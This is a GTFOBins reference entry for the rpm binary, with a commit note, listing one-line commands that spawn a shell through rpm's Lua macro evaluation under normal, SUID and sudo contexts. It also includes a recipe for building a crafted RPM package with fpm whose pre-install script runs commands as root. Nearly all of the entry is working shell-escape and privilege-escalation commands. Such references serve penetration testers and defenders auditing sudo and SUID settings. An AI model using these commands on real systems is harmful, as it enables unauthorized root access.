GTFOBins.github.io/_gtfobins/rpm.md
brian 3bd955e8cc Use os.execute instead of posix.exec in rpm
From rpm versions 4.9.0 and on, posix.exec() will return an error unless called
from a child process created with posix.fork(). os.execute() may be used
instead.

This change is documented in these two resources:

- http://rpm.org/user_doc/lua.html
- https://rpm-packaging-guide.github.io/

Close #53.
2019-02-14 12:32:18 +01:00

593 B

functions
shell suid sudo
code
rpm --eval '%{lua:os.execute("/bin/sh")}'
code
./rpm --eval '%{lua:os.execute("/bin/sh", "-p")}'
code
sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
description code
It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target. ``` TF=$(mktemp -d) echo 'id' > $TF/x.sh fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF ``` sudo rpm -ivh x-1.0-1.noarch.rpm